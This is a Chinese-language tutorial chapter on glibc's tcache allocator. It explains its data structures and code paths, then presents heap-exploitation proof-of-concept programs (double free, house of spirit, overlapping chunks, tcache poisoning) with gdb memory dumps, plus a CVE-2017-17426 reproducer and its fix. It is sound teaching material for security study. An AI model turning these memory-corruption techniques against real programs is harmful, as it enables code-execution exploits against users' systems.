4.14 glibc tcache 机制

tcache

tcache 全名 thread local caching，它为每个线程创建一个缓存（cache），从而实现无锁的分配算法，有不错的性能提升。libc-2.26 正式提供了该机制，并默认开启，具体可以查看这次 commit。

数据结构

glibc 在编译时使用 USE_TCACHE 条件来开启 tcache 机制，并定义了下面一些东西：

#if USE_TCACHE
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
   idx 1   bytes 25..40 or 13..20
   idx 2   bytes 41..56 or 21..28
   etc.  */

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

值得注意的是，每个线程默认使用 64 个单链表结构的 bin，每个 bin 最多存放 7 个 chunk。各 bin 能容纳的最大用户请求大小在 64 位机器上以 16 字节递增，从 24 到 1032 字节；在 32 位机器上（按上面注释中的取值）则以 8 字节递增，从 12 到 516 字节（12 + 63 × 8）。所以 tcache bin 只用于存放 non-large 的 chunk。

然后引入了两个新的数据结构，tcache_entry 和 tcache_perthread_struct：

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  /* Next entry in the same bin's singly linked list.  */
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  /* counts[i]: number of chunks currently linked in entries[i].  The
     element type is plain char, so each counter occupies one byte.  */
  char counts[TCACHE_MAX_BINS];
  /* entries[i]: head of the singly linked list of cached chunks for
     bin i.  */
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

/* Per-thread pointer to the cache structure.  It starts out NULL and is
   only assigned once the structure has been allocated.  */
static __thread tcache_perthread_struct *tcache = NULL;

tcache_perthread_struct 包含一个数组 entries，用于放置 64 个 bins，数组 counts 存放每个 bins 中的 chunk 数量。每个被放入相应 bins 中的 chunk 都会在其用户数据中包含一个 tcache_entry（FD指针），指向同 bins 中的下一个 chunk，构成单链表。

tcache 初始化操作如下：

/* Allocate and zero the calling thread's tcache_perthread_struct and
   publish it through the thread-local TCACHE pointer.  Does nothing when
   tcache_shutting_down is set.  On allocation failure TCACHE is left
   unchanged.  */
static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  /* Pick an arena and try to carve the structure out of it.
     NOTE(review): arena_get presumably returns with the arena's mutex
     held, since the mutex is released further down -- confirm against
     its definition.  */
  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
  /* First attempt failed although an arena was found: ask for another
     arena and try once more.  */
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }


  /* Release the arena lock regardless of whether the allocation
     succeeded.  */
  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim;
      /* Zeroing makes every count 0 and every bin head a null pointer.  */
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }

}

使用

触发在 tcache 中放入 chunk 的操作：

free 时：在 fastbin 的操作之前进行，如果 chunk size 符合要求，并且对应的 bins 还未装满，则将其放进去。

#if USE_TCACHE
{
  size_t tc_idx = csize2tidx (size);

  if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
    {
tcache_put (p, tc_idx);
return;
    }
}
#endif

malloc 时：有三个地方会触发。

如果从 fastbin 中成功返回了一个需要的 chunk，那么对应 fastbin 中的其他 chunk 会被放进相应的 tcache bin 中，直到上限。需要注意的是 chunks 在 tcache bin 的顺序和在 fastbin 中的顺序是反过来的。

#if USE_TCACHE
        /* While we're here, if we see other chunks of the same size,
  	 stash them in the tcache.  */
        size_t tc_idx = csize2tidx (nb);
        if (tcache && tc_idx < mp_.tcache_bins)
  	{
  	  mchunkptr tc_victim;

  	  /* While bin not empty and tcache not full, copy chunks.  */
  	  while (tcache->counts[tc_idx] < mp_.tcache_count
  		 && (tc_victim = *fb) != NULL)
  	    {
  	      if (SINGLE_THREAD_P)
  		*fb = tc_victim->fd;
  	      else
  		{
  		  REMOVE_FB (fb, pp, tc_victim);
  		  if (__glibc_unlikely (tc_victim == NULL))
  		    break;
  		}
  	      tcache_put (tc_victim, tc_idx);
  	    }
  	}
#endif

smallbin 中的情况与 fastbin 相似，双链表中的剩余 chunk 会被填充到 tcache bin 中，直到上限。

#if USE_TCACHE
    /* While we're here, if we see other chunks of the same size,
       stash them in the tcache.  */
    size_t tc_idx = csize2tidx (nb);
    if (tcache && tc_idx < mp_.tcache_bins)
      {
        mchunkptr tc_victim;

        /* While bin not empty and tcache not full, copy chunks over.  */
        while (tcache->counts[tc_idx] < mp_.tcache_count
  	     && (tc_victim = last (bin)) != bin)
  	{
  	  if (tc_victim != 0)
  	    {
  	      bck = tc_victim->bk;
  	      set_inuse_bit_at_offset (tc_victim, nb);
  	      if (av != &main_arena)
  		set_non_main_arena (tc_victim);
  	      bin->bk = bck;
  	      bck->fd = bin;

  	      tcache_put (tc_victim, tc_idx);
              }
  	}
      }
#endif

binning code（chunk合并等其他情况）中，每一个符合要求的 chunk 都会优先被放入 tcache，而不是直接返回（除非tcache被装满）。寻找结束后，tcache 会返回其中一个。

#if USE_TCACHE
        /* Fill cache first, return to user only if cache fills.
  	 We may return one of these chunks later.  */
        if (tcache_nb
  	  && tcache->counts[tc_idx] < mp_.tcache_count)
  	{
  	  tcache_put (victim, tc_idx);
  	  return_cached = 1;
  	  continue;
  	}
        else
  	{
#endif

触发从 tcache 中取出 chunk 的操作：

在 __libc_malloc() 调用 _int_malloc() 之前，如果 tcache bin 中有符合要求的 chunk，则直接将它返回。

#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  checked_request2size (bytes, tbytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

binning code 中，如果在 tcache 中放入 chunk 达到上限，则会直接返回最后一个 chunk。

#if USE_TCACHE
    /* If we've processed as many chunks as we're allowed while
   filling the cache, return one of the cached ones.  */
    ++tcache_unsorted_count;
    if (return_cached
    && mp_.tcache_unsorted_limit > 0
    && tcache_unsorted_count > mp_.tcache_unsorted_limit)
  {
    return tcache_get (tc_idx);
  }
#endif

当然默认情况下没有限制，所以这段代码也不会执行：

.tcache_unsorted_limit = 0 /* No limit.  */

binning code 结束后，如果没有直接返回（如上），那么如果有至少一个符合要求的 chunk 被找到，则返回最后一个。

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
  {
    return tcache_get (tc_idx);
  }
#endif

另外还需要注意的是 tcache 中的 chunk 不会被合并，无论是相邻 chunk，还是 chunk 和 top chunk。因为这些 chunk 会被标记为 inuse。

安全性分析

tcache_put() 和 tcache_get() 分别用于向单链表中放入 chunk 和从单链表中取出 chunk：

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  /* The list node lives in the chunk's user-data area.  */
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  /* Push onto the front of the bin: the new entry points at the old
     head and becomes the new head.  Nothing here inspects the chunk
     itself or checks whether it is already in the list.  */
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  /* Take the current head of the bin.  */
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  /* NOTE(review): this assertion tests the head pointer, not
     counts[tc_idx]; the counter is decremented below without being
     checked first.  */
  assert (tcache->entries[tc_idx] > 0);
  /* Whatever value is stored in e->next becomes the new head; it is
     not validated in any way.  */
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

可以看到注释部分，它假设调用者已经对参数进行了有效性检查，然而由于对 tcache 的操作在 free 和 malloc 中往往都处于很靠前的位置，导致原来的许多有效性检查都被无视了。这样做虽然有利于提升执行效率，但对安全性造成了负面影响。

tcache_dup

#include <stdlib.h>
#include <stdio.h>

/* tcache_dup demo: free the same small chunk twice in a row, then
   allocate twice with the same size and print the pointers that come
   back.  The double free is the point of the demo, not an accident.  */
int main() {
    void *p1 = malloc(0x10);
    fprintf(stderr, "1st malloc(0x10): %p\n", p1);

    /* Release the very same pointer two times.  */
    fputs("Freeing the first one\n", stderr);
    free(p1);
    fputs("Freeing the first one again\n", stderr);
    free(p1);

    /* Two requests of the same size, printed in the order they are made.  */
    void *p2 = malloc(0x10);
    fprintf(stderr, "2nd malloc(0x10): %p\n", p2);
    void *p3 = malloc(0x10);
    fprintf(stderr, "3rd malloc(0x10): %p\n", p3);

    return 0;
}

$ ./tcache_dup
1st malloc(0x10): 0x56088c39f260
Freeing the first one
Freeing the first one again
2nd malloc(0x10): 0x56088c39f260
3rd malloc(0x10): 0x56088c39f260

tcache_dup 与 fastbin_dup 类似，但其实更加简单，因为它并不局限于 fastbin，只要在 tcache chunk 范围内的都可以，而且 double-free 也不再需要考虑 top 的问题，直接 free 两次就可以了。然后我们就可以得到相同的 chunk。

第一次 free 后：

gdb-peda$ x/4gx 0x0000555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000021
0x555555756260: 0x0000000000000000      0x0000000000000000
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/10gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000001      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000555555756260      0x0000000000000000  <-- entries

chunk 被放入相应的 tcache bin 中，可以看到该 tcache bin 的 counts 被设为 1，表示有 1 个 chunk，入口为 0x0000555555756260。

第二次 free 后：

gdb-peda$ x/4gx 0x0000555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000021  <-- chunk 1 [double freed]
0x555555756260: 0x0000555555756260      0x0000000000000000
gdb-peda$ x/10gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000002      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000555555756260      0x0000000000000000  <-- entries

counts 变成 2，入口不变，表示 tcache bin 已经有两个 chunk 了，虽然是相同的。

两次 malloc 后：

gdb-peda$ x/10gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000555555756260      0x0000000000000000

于是我们得到了两个指向同一块内存区域的指针。

tcache_house_of_spirit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* tcache_house_of_spirit demo: build a fake chunk header in a stack
   array, pass a pointer into that array to free(), then request a
   matching size from malloc() and print the pointer that comes back.  */
int main() {
    malloc(1);  // init heap

    fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");
    unsigned long long *a, *b;
    // Stack buffer, 16-byte aligned, that will pose as a heap chunk.
    unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));

    fprintf(stderr, "The chunk:  %p\n", &fake_chunk[0]);

    // Element 1 plays the role of the chunk's size field.
    fake_chunk[1] = 0x110;  // the size
    // Fill everything after the first two elements with 'A' so later
    // writes are easy to spot in a memory dump.
    memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);

    // NOTE(review): the message prints &fake_chunk[0], while the pointer
    // actually stored in `a` on the next line is &fake_chunk[2].
    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
    // `a` points just past the two header elements, i.e. at what would
    // be the user-data area of the fake chunk.
    a = &fake_chunk[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    // Deliberately frees memory that never came from malloc().
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
    // Request a size that is expected to map to the fake chunk's size.
    b = malloc(0x100);
    // Overwrite the region with 'B' to show it is now in use again.
    memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
    fprintf(stderr, "malloc(0x100): %p\n", b);
}

$ ./tcache_house_of_spirit
We will overwrite a pointer to point to a fake 'smallbin' region.
The chunk:  0x7fffffffdb00
Overwritting our pointer with the address of the fake region inside the fake chunk, 0x7fffffffdb00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7fffffffdb00, which will be 0x7fffffffdb10!
malloc(0x100): 0x7fffffffdb10

tcache 在释放堆块时没有对其前后堆块进行合法性校验，只需要本块对齐（2*SIZE_SZ）就可以将堆块释放到 tcache 中，而在申请时，tcache 对内部大小合适的堆块也是直接分配的，导致常见的 house_of_spirit 可以延伸到 smallbin，而且比以前更加简单。

在栈上构造 fake chunk，大小为 smallbin：

gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000      0x0000000000000110  <-- fake chunk
0x7fffffffdae0: 0x4141414141414141      0x4141414141414141
0x7fffffffdaf0: 0x4141414141414141      0x4141414141414141
0x7fffffffdb00: 0x4141414141414141      0x4141414141414141
0x7fffffffdb10: 0x4141414141414141      0x4141414141414141

free 掉之后，该 fake chunk 被放进 tcache bin：

gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000      0x0000000000000110  <-- fake chunk [be freed]
0x7fffffffdae0: 0x0000000000000000      0x4141414141414141
0x7fffffffdaf0: 0x4141414141414141      0x4141414141414141
0x7fffffffdb00: 0x4141414141414141      0x4141414141414141
0x7fffffffdb10: 0x4141414141414141      0x4141414141414141
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/30gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0100000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000000000000000
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x00007fffffffdae0  <-- entries
0x5555557560d0: 0x0000000000000000      0x0000000000000000
0x5555557560e0: 0x0000000000000000      0x0000000000000000
0x5555557560f0: 0x0000000000000000      0x0000000000000000

最后 malloc 即可将 fake chunk 取出来：

gdb-peda$ p b
$1 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ p a
$2 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000      0x0000000000000110  <-- new chunk
0x7fffffffdae0: 0x4242424242424242      0x4242424242424242
0x7fffffffdaf0: 0x4242424242424242      0x4242424242424242
0x7fffffffdb00: 0x4242424242424242      0x4242424242424242
0x7fffffffdb10: 0x4242424242424242      0x4242424242424242

于是我们就得到了一个在栈上的 chunk。

tcache_overlapping_chunks

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

/* tcache_overlapping_chunks demo: allocate a victim chunk (p1) followed
   by a sentry chunk (p2), overwrite the victim's size field with a larger
   value, free it, and then request that larger size.  The returned
   region (p3) starts at p1 and extends over p2; both ranges are printed
   so the overlap is visible.  */
int main() {
    intptr_t *p1, *p2, *p3;

    p1 = malloc(0x50 - 8);
    p2 = malloc(0x20 - 8);
    memset(p1, 0x41, 0x50-8);
    /* Fill exactly the 0x20-8 bytes that were requested for p2 (the same
       length used for the p2 range printed at the end).  A longer fill
       would run past the allocation and clobber the header of whatever
       chunk follows it.  */
    memset(p2, 0x41, 0x20-8);
    /* %p expects a void pointer, hence the casts.  */
    fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", (void *)p1);
    fprintf(stderr, "Allocated sentry element after victim: %p\n", (void *)p2);

    int evil_chunk_size = 0x110;
    int evil_region_size = 0x110 - 8;
    fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
    /* The word immediately before the user pointer is the chunk's size
       field; overwriting it simulates a heap corruption bug.  */
    *(p1-1) = evil_chunk_size;
    fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
    free(p1);

    /* Ask for the forged size and fill the whole returned region.  */
    p3 = malloc(evil_region_size);
    memset(p3, 0x42, evil_region_size);
    fprintf(stderr, "Requested a chunk of 0x100 bytes\n");
    fprintf(stderr, "p3: %p ~ %p\n", (void *)p3, (void *)((char *)p3+evil_region_size));
    fprintf(stderr, "p2: %p ~ %p\n", (void *)p2, (void *)((char *)p2+0x20-8));
}

$ ./tcache_overlapping_chunks
Allocated victim chunk with requested size 0x48: 0x555555756260
Allocated sentry element after victim: 0x5555557562b0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x100 bytes
p3: 0x555555756260 ~ 0x555555756368
p2: 0x5555557562b0 ~ 0x5555557562c8

在 _int_free() 中，chunk 被放入 tcache 之前，libc 几乎没有对它进行检查（如前所述，只要求本块对齐，并不校验其 size 是否与相邻 chunk 一致），所以我们可以直接修改其 size，在 free 时该 chunk 就被放进了不同的 tcache bin。在下一次 malloc 时得到不一样大小的 chunk，造成堆块重叠。

首先我们分配两个 chunk：

gdb-peda$ x/16gx 0x555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000051  <-- chunk p1
0x555555756260: 0x4141414141414141      0x4141414141414141
0x555555756270: 0x4141414141414141      0x4141414141414141
0x555555756280: 0x4141414141414141      0x4141414141414141
0x555555756290: 0x4141414141414141      0x4141414141414141
0x5555557562a0: 0x4141414141414141      0x0000000000000021  <-- chunk p2
0x5555557562b0: 0x4141414141414141      0x4141414141414141
0x5555557562c0: 0x4141414141414141      0x0000000000000411

然后修改第一个的 size 并将其释放：

gdb-peda$ x/16gx 0x555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000110  <-- chunk p1 [be freed]
0x555555756260: 0x0000000000000000      0x4141414141414141
0x555555756270: 0x4141414141414141      0x4141414141414141
0x555555756280: 0x4141414141414141      0x4141414141414141
0x555555756290: 0x4141414141414141      0x4141414141414141
0x5555557562a0: 0x4141414141414141      0x0000000000000021  <-- chunk p2
0x5555557562b0: 0x4141414141414141      0x4141414141414141
0x5555557562c0: 0x4141414141414141      0x0000000000000411
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/30gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0100000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000000000000000
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x0000555555756260  <-- entries
0x5555557560d0: 0x0000000000000000      0x0000000000000000
0x5555557560e0: 0x0000000000000000      0x0000000000000000
0x5555557560f0: 0x0000000000000000      0x0000000000000000

可以看到 chunk p1 并没有放到它应该去的 tcache bin 中，而是放到了修改 size 后对应的 tcache bin。

最后将其 malloc 出来：

gdb-peda$ p p3
$1 = (intptr_t *) 0x555555756260
gdb-peda$ p p2
$2 = (intptr_t *) 0x5555557562b0
gdb-peda$ p p1
$3 = (intptr_t *) 0x555555756260
gdb-peda$ x/36gx 0x555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000110  <-- chunk p3
0x555555756260: 0x4242424242424242      0x4242424242424242
0x555555756270: 0x4242424242424242      0x4242424242424242
0x555555756280: 0x4242424242424242      0x4242424242424242
0x555555756290: 0x4242424242424242      0x4242424242424242
0x5555557562a0: 0x4242424242424242      0x4242424242424242  <-- chunk p2
0x5555557562b0: 0x4242424242424242      0x4242424242424242
0x5555557562c0: 0x4242424242424242      0x4242424242424242
0x5555557562d0: 0x4242424242424242      0x4242424242424242
0x5555557562e0: 0x4242424242424242      0x4242424242424242
0x5555557562f0: 0x4242424242424242      0x4242424242424242
0x555555756300: 0x4242424242424242      0x4242424242424242
0x555555756310: 0x4242424242424242      0x4242424242424242
0x555555756320: 0x4242424242424242      0x4242424242424242
0x555555756330: 0x4242424242424242      0x4242424242424242
0x555555756340: 0x4242424242424242      0x4242424242424242
0x555555756350: 0x4242424242424242      0x4242424242424242
0x555555756360: 0x4242424242424242      0x0000000000000000

于是 chunk p2 被 chunk p3 覆盖了。

tcache_poisoning

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

/* tcache_poisoning demo: free a chunk, overwrite the first word of the
   freed memory with the address of a stack array, then allocate the same
   size twice and print both returned pointers.  The write after free()
   is deliberate: it simulates a use-after-free bug.  */
int main() {
    intptr_t *p1, *p2, *p3;
    // Stack array whose address will be written into the freed chunk.
    size_t target[10];
    printf("Our target is a stack region at %p\n", (void *)target);

    p1 = malloc(0x30);
    // NOTE(review): writes 0x30+8 bytes into a 0x30-byte request; this
    // assumes the allocator hands out at least 8 usable bytes beyond the
    // requested size -- confirm for the target platform.
    memset(p1, 0x41, 0x30+8);
    fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);

    fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
    free(p1);
    fprintf(stderr, "Emulating corruption of the next ptr\n");
    // Write through the dangling pointer: the first word of the freed
    // user area now holds the address of `target`.
    *p1 = (int64_t)target;

    fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
    // First request of the same size.
    p2 = malloc(0x30);
    memset(p2, 0x42, 0x30+8);
    // Second request of the same size; the 0x30+8-byte fill below lands
    // wherever this pointer points.
    p3 = malloc(0x30);
    memset(p3, 0x42, 0x30+8);
    fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
}

$ ./tcache_poisoning
Our target is a stack region at 0x7fffffffdcc0
Allocated victim chunk with requested size 0x30 at 0x555555756670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr
Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x30) returned 0x555555756670, the second one: 0x7fffffffdcc0

该实例通过破坏 tcache bin 中 chunk 的 fd 指针，将其指向不同的位置，从而改变 tcache_entry 的 next 指针，在 malloc 时在任意位置得到 chunk。而 tcache_get() 函数没有对此做任何的检查。

分配一个 chunk p1 后释放，该 chunk 将被放入相应的 tcache bin，其 fd 指针被清空：

gdb-peda$ x/10gx (void *)p1-0x10
0x555555756660: 0x0000000000000000      0x0000000000000041  <-- chunk p1 [be freed]
0x555555756670: 0x0000000000000000      0x4141414141414141    <-- fd pointer
0x555555756680: 0x4141414141414141      0x4141414141414141
0x555555756690: 0x4141414141414141      0x4141414141414141
0x5555557566a0: 0x4141414141414141      0x0000000000020961
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/12gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000010000      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000555555756670      0x0000000000000000  <-- entries

然后修改 fd 指针指向栈上的地址 target：

gdb-peda$ x/10gx (void *)p1-0x10
0x555555756660: 0x0000000000000000      0x0000000000000041  <-- chunk p1 [be freed]
0x555555756670: 0x00007fffffffdc80      0x4141414141414141    <-- fd pointer
0x555555756680: 0x4141414141414141      0x4141414141414141
0x555555756690: 0x4141414141414141      0x4141414141414141
0x5555557566a0: 0x4141414141414141      0x0000000000020961

接下来的第一次 malloc 会把原来 chunk p1 所在的那块内存取出：

gdb-peda$ x/10gx (void *)p1-0x10
0x555555756660: 0x0000000000000000      0x0000000000000041  <-- chunk p2
0x555555756670: 0x4242424242424242      0x4242424242424242
0x555555756680: 0x4242424242424242      0x4242424242424242
0x555555756690: 0x4242424242424242      0x4242424242424242
0x5555557566a0: 0x4242424242424242      0x0000000000020961
gdb-peda$ x/12gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0000000000000000
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x00007fffffffdc80      0x0000000000000000  <-- entries

可以看到 tcache 的 entries 被修改为我们伪造的 fd 地址。

第二次 malloc，虽然 tcache bin 的 counts 为 0，但它并没有做检查，直接在 entries 指向的地方返回了一个 chunk：

gdb-peda$ x/10gx (void *)p3-0x10
0x7fffffffdc70: 0x0000555555756670      0x00007fffffffdc80  <-- chunk p3
0x7fffffffdc80: 0x4242424242424242      0x4242424242424242
0x7fffffffdc90: 0x4242424242424242      0x4242424242424242
0x7fffffffdca0: 0x4242424242424242      0x4242424242424242
0x7fffffffdcb0: 0x4242424242424242      0x0000000000000000

于是我们得到了一个在栈上的 chunk。

有趣的是 tcache bin 的 counts 居然产生了整数下溢（单字节计数器回绕：0x00-1=0xff）：

gdb-peda$ x/12gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000ff0000      0x0000000000000000
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x00000000000000c2      0x0000000000000000

看来这个机制仍然存在很多的问题啊。

注：突然发现这个 0xff 在 unsorted bin attack 里有很巧妙的用处，参考章节 3.1.8。

这一节的代码可以在这里找到。其他的一些情况可以参考章节 3.3.6。

CTF 实例

在最近的 CTF 中，已经开始尝试使用 libc-2.26，比如章节 6.1.15、6.1.19 中的例子。

CVE-2017-17426

libc-2.26 中的 tcache 机制被发现了安全漏洞：__libc_malloc() 使用 request2size() 将所请求的分配大小转换为实际的 chunk 大小，而 request2size() 不会进行整数溢出检查。所以如果请求一个非常大的堆块（接近 SIZE_MAX），将会导致整数溢出，从而导致 malloc 错误地返回了 tcache bin 里的堆块。

一个例子：

#include <stdio.h>
#include <stdlib.h>

/* Reproducer for CVE-2017-17426: allocate and free a small block, then
   issue a request of SIZE_MAX - 2 bytes and print what malloc returns
   for each.  */
int main() {
    /* Small allocation that is released again right away.  */
    void *small = malloc(10);
    printf("malloc(10): %p\n", small);
    free(small);

    /* Largest size_t value minus 2: a request that cannot be satisfied.  */
    const size_t near_max = (size_t)-1 - 2;
    void *huge = malloc(near_max);
    printf("malloc(((size_t)~0) - 2): %p\n", huge);

    return 0;
}

$ gcc cve201717426.c
$ /usr/local/glibc-2.26/lib/ld-2.26.so ./a.out
malloc(10): 0x7f3f945ed260
malloc(((size_t)~0) - 2): 0x7f3f945ed260
$ /usr/local/glibc-2.27/lib/ld-2.27.so ./a.out
malloc(10): 0x7f399c69e260
malloc(((size_t)~0) - 2): (nil)

可以看到在使用 libc-2.26 时，第二次 malloc 返回了第一次 free 的堆块。而在使用 libc-2.27 时返回 NULL，说明该问题已被修复。

patch

该漏洞在 libc-2.27 的这次 commit 中被修复。方法是用更安全的 checked_request2size() 替换 request2size()，以实现对整数溢出的检查：

$ git show 34697694e8a93b325b18f25f7dcded55d6baeaf6 malloc/malloc.c | cat
